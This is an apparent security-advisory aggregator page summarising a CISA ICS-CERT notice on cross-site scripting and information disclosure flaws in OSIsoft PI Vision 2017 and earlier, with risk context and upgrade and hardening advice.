OTPulse
FeedAboutContact

OSIsoft PI Vision

Monitor6.1ICS-CERT ICSA-18-072-03Mar 13, 2018
Attack VectorNetwork
Auth RequiredNone
ComplexityLow
User InteractionRequired
Summary

PI Vision versions 2017 and earlier contain cross-site scripting (CWE-693) and information disclosure (CWE-200) vulnerabilities in the web interface. These flaws allow an attacker to inject malicious scripts that execute in the context of a user's browser session, potentially exposing sensitive process data or manipulating displayed information. The vulnerability requires user interaction (clicking a malicious link) but can be exploited remotely with low skill. OSIsoft recommends upgrading to PI Vision 2017 R2 Update 1.

What this means
What could happen
An attacker could steal sensitive process data or plant information through PI Vision's web interface, or modify displayed data to mislead operators about system status.
Who's at risk
Water utilities, electric utilities, and other critical infrastructure operators using OSIsoft PI Vision 2017 or earlier for real-time process visualization and monitoring should prioritize this update. PI Vision is commonly used to display live data from PLCs, RTUs, and historians across water treatment, power distribution, and manufacturing facilities.
How it could be exploited
An attacker could craft a malicious link or embed malicious script in web pages that PI Vision users visit. When an operator clicks the link or visits the page, the script runs in their browser within the PI Vision session, allowing the attacker to read sensitive process data or manipulate what the operator sees on screen.
Prerequisites
  • User must click a malicious link or visit a compromised web page while logged into PI Vision
  • PI Vision must be accessible from the network where the attacker can reach it
remotely exploitableno authentication requiredlow complexityaffects critical process visualization systems
Exploitability
Low exploit probability (EPSS 0.2%)
Affected products (1)
ProductAffected VersionsFix Status
PI Vision:≤ 20172017 R2 Update 1
Remediation & Mitigation
0/3
Do now
0/1
HARDENINGTrain operators to avoid clicking suspicious links and to verify the URL before entering credentials into PI Vision
Schedule — requires maintenance window
0/1

Patching may require device reboot — plan for process interruption

HOTFIXUpgrade PI Vision to version 2017 R2 Update 1 or later
Long-term hardening
0/1
HARDENINGRestrict network access to PI Vision web servers using firewall rules to limit exposure to trusted engineering and monitoring networks only
View full CISA ICS-CERT advisory
↑↓ Navigate · Esc Close
API: /api/v1/advisories/fe81bd9f-441d-40b8-b184-88078b2e1fd3
OSIsoft PI Vision | CVSS 6.1 - OTPulse